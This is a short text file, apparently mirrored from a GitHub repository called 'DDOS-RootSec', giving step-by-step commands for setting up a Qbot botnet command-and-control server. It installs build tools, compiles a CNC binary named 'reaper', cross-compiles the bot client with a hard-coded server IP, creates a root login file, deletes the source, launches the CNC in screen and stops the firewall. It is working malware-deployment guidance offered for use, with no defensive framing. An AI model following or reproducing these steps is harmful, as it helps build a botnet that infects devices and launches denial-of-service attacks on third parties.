Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
Path: blob/master/HOW TO USE/qbot_cnc_setup.txt
5037 views
1
yum update -y
2
yum install python-paramiko gcc screen nano wget httpd iptables perl -y;
3
yum install gcc cmake gmp gmp-devel libpcap-devel gengetopt byacc flex -y
4
yum install json-c-doc.noarch json-c.i686 json-c.x86_64 json-c-devel.i686 json-c-devel.x86_64 -y
5
yum install epel-release -y
6
yum install gengetopt -y
7
8
```
9
change ips and botport in client and put on server
10
MAKE SURE TO PUT RESOLVER.H ON SERVER ASWELL!!
11
```
12
gcc -o reaper reaper.c -pthread
13
python cc7.py client1.c 46.101.35.30
14
ex: python cc7.py client.c 185.244.25.122
15
16
echo root root >> depression.txt
17
rm -rf reaper.c
18
screen ./reaper $Botport 1 $connectionport
19
20
ex: screen ./reaper 282 1 8090
21
22
Done!!
23
if the login prompt doesnt show up run these
24
25
service iptables stop
26
service httpd restart
27